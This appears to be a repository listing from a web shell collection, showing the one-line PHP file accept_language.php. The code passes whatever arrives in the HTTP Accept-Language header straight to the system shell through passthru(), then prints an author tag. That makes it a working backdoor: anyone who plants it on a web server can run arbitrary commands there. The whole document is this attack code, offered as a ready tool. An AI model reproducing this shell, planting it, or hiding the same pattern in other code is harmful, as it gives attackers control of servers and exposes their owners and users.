webshells/php/accept_language.php
2015-01-12 17:32:48 -05:00

1 line
76 B
PHP

<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>